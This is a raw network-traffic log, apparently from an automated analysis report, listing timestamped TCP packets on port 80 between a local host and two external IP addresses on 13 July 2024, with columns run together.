                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370912075 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370945930 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370978117 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370982885 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.370982885 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371023893 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371057034 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371066093 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371066093 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371098995 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371113062 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371138096 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371170044 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371181011 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371205091 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371232986 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371236086 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371264935 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371296883 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371304989 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371304989 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371329069 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371361017 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371368885 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371368885 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371393919 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371427059 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371431112 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371432066 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371459007 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371481895 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371491909 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371491909 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371499062 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371514082 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371515989 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371530056 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371543884 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371545076 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371558905 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371561050 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371570110 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371576071 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371592999 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371603012 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371603012 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371603012 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371608973 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371665001 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371705055 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371705055 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371726036 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371742010 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371781111 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371781111 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371838093 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371851921 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371866941 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371882915 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371890068 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371898890 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371913910 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371927977 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371928930 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371928930 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371968031 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371972084 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371978998 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.371985912 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372000933 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372041941 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372041941 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372088909 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372106075 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372119904 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372134924 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372145891 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372145891 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372148991 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372162104 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372164965 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372173071 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372179031 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372183084 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372195005 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372210026 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372219086 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372219086 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372234106 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372245073 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372281075 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372281075 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372348070 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372363091 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372375965 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372400045 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.372458935 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.373859882 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.373912096 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.373924971 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.373951912 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.373990059 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374005079 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374018908 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374027967 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374027967 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374034882 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374049902 CEST805898185.28.47.70192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374059916 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374059916 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374087095 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.374087095 CEST5898180192.168.2.585.28.47.70
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375447035 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375509024 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375514030 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375529051 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375564098 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375564098 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375564098 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375580072 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375596046 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375611067 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375612974 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375627041 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375638008 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375659943 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375694036 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375710011 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375725985 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375737906 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375741005 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375751019 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375757933 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375766039 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375778913 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375796080 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375834942 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375853062 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375866890 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375883102 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375899076 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375900030 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375921965 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375945091 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375945091 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375962973 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375979900 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.375994921 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376008987 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376019001 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376019001 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376039982 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376059055 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376068115 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376084089 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376099110 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376113892 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376127005 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376128912 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376152992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376176119 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376209021 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376224041 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376239061 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376262903 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376266003 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376279116 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376287937 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376296043 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376308918 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376312971 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376329899 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376334906 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376334906 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376347065 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376360893 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376377106 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376394033 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376395941 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376488924 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376507998 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376513958 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376552105 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376552105 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376636982 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376687050 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376702070 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376702070 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376719952 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376733065 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376765966 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376765966 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376851082 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376867056 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376883030 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376897097 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376900911 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376913071 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376924992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376924992 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376930952 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376948118 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376957893 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376957893 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376969099 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376985073 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376985073 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.376996040 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377011061 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377017975 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377034903 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377049923 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377064943 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377065897 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377065897 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377079964 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377091885 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377093077 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377113104 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377130985 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377139091 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377155066 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377170086 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377191067 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377199888 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377213001 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377213955 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377217054 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377233028 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377242088 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377249956 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377259970 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377268076 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377276897 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377298117 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377315998 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377352953 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377367020 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377381086 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377403021 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377413988 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377413988 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377419949 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377434969 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377435923 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377449989 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377461910 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377461910 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377481937 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.377500057 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378251076 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378308058 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378366947 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378381014 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378397942 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378413916 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378423929 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378423929 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378429890 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378446102 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378447056 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378463030 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378473997 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378473997 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378494978 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378514051 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378614902 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378631115 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378644943 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378659010 CEST805898277.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378665924 CEST5898280192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:06.378674984 CEST805898277.91.77.81192.168.2.5
